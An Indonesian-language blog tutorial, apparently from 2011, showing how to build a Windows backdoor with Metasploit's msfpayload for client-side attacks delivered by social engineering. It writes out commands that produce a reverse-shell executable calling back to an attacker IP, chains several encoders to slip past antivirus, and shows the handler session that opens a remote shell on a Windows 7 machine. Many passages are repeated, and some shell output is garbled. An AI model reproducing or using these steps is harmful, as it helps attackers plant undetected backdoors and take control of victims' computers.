Sebelum bobo ... kita kali ini akan belajar bagaimana membuat file yang akan kita gunakan untuk membuat serangan dari sisi client !!! teknik seperti biasanya digunakan oleh hacker dengan metode "Social Enginering".
bersama sama mari kita buka metasploit nya masing masing......
mari kita buka metaploit nya masing masing ....
kita menggunakan tools yang bernama msfpayload :
root@whitecyber-server:/op t/framework-3.5.1/msf3# msfpayload
Kali ini kita akan membuat file pemicu yang dapat kita letakkan pada sisi client.
backdoor klo kita sering mengenalnya. kali ini kita akan mencoba membuat backdoor untuk Windows, jadi hasil keluarannya nanti berupa file exe. sebenarnya bisa jg sie kita setting keluarannya jadi perl atau c. tapi kita coba buat 1 dulu backdoornya sebelum bobo ya.....
bersama sama mari kita buka metasploit nya masing masing......
mari kita buka metaploit nya masing masing ....
kita menggunakan tools yang bernama msfpayload :
root@whitecyber-server:/op
Kali ini kita akan membuat file pemicu yang dapat kita letakkan pada sisi client.
backdoor klo kita sering mengenalnya. kali ini kita akan mencoba membuat backdoor untuk Windows, jadi hasil keluarannya nanti berupa file exe. sebenarnya bisa jg sie kita setting keluarannya jadi perl atau c. tapi kita coba buat 1 dulu backdoornya sebelum bobo ya.....
tulis perintah perintah dibawah ini
1. ./msfpayload windows/shell_reverse_tcp O
(kita gunakan untuk mengecek apakah module ini berjalan normal)
1. ./msfpayload windows/shell_reverse_tcp O
(kita gunakan untuk mengecek apakah module ini berjalan normal)
2. ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 O
(kita akan melakukan back connect dari ip pc kita 172.16.104.130, dan port 31337)
3. Gunakan tambahan perintah untuk membuat file backdoor 1.exe
(X > /tmp/1.exe)
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
4. lalu kita buka file nya dengan perintah
file /tmp/1.exe
Nah selesai dech ....
Kita sudah membuat backdoor untuk windows dengan menggunakan metasploit.
(kita akan melakukan back connect dari ip pc kita 172.16.104.130, dan port 31337)
3. Gunakan tambahan perintah untuk membuat file backdoor 1.exe
(X > /tmp/1.exe)
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
4. lalu kita buka file nya dengan perintah
file /tmp/1.exe
Nah selesai dech ....
Kita sudah membuat backdoor untuk windows dengan menggunakan metasploit.
Sekarang setelah seperti ini kita praktekkan langsung ya..
Invalid payload: dos/windows/shell_reverse_
root@whitecyber-server:/op
root@whitecybe...r-server:/opt/framework-3.
root@whitecyber-server:/op
Name: Windows Command Shell, Reverse TCP Inline
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 314
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecu
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 172.16.104.130 yes The listen address
LPORT 31337 yes The listen port
Description:
Connect back to attacker and spawn a command shell
root@whitecyber-server:/op
Created by msfpayload (http://www.metasploit.com/).
Payload: windows/shell_reverse_tcp
Length: 314
Options: LHOST=172.16.104.130,LPORT
root@whitecyber-server:/op
/tmp/1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@whitecyber-server:/op
kita jg dapat membuat backdoor versi : Windows, Linux, Unix, BSD, Solaris juga .... caranya dengan menggunakan payload yang berbeda dengan cara ketik msfpayload (enter) nanti akan muncul backconnect berbagai system..
Nah terus bagaimana cara menggunakannya..... dengan menyambungkan ke metasploitnya......???
masih terdeteksi oleh antivirus......????
kita buat lagi dengan perintah seperti ini
./msfpayload windows/shell_reverse_tcp LHOST=192.168.11.5 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
root@whitecyber:/opt/frame
/tmp/2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@whitecyber:/opt/frame
nah sekarang kita coba lagi nie masukin ke windows.... kali ini saya menggunakan windows 7 sebagai target apakah masih terdetect ???
Nah sukses ....... tidak terdetect antivirus kan ......... padahal itu baru encode versi ke 2......
sekarang kita jalankan dulu backdoor yang sudah kita tanam di windows 7 tadi..
Successss....... !!!!!
kita mendapatkan rootnya windows...................
disini ya cara masuknya..
msf > use exploit/multi/handler
msf exploit(handler) > show options
Module options:
... Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell/reverse_tcp ):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.11.5
LHOST => 192.168.11.5
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.11.5:31337
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.11.200
[*] Command shell session 1 opened (192.168.11.5:31337 -> 192.168.11.200:49258) at 2011-03-17 12:37:09 +0700
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
F:\>More? dir
More? dir
dir
'����u�G rojdir' is not recognized as an internal or external command,
operable program or batch file.
F:\>dir
msf exploit(handler) > show options
Module options:
... Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell/reverse_tcp
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.11.5
LHOST => 192.168.11.5
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.11.5:31337
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.11.200
[*] Command shell session 1 opened (192.168.11.5:31337 -> 192.168.11.200:49258) at 2011-03-17 12:37:09 +0700
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
F:\>More? dir
More? dir
dir
'����u�G rojdir' is not recognized as an internal or external command,
operable program or batch file.
F:\>dir
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
Silahkan Tulis Komentar Anda ...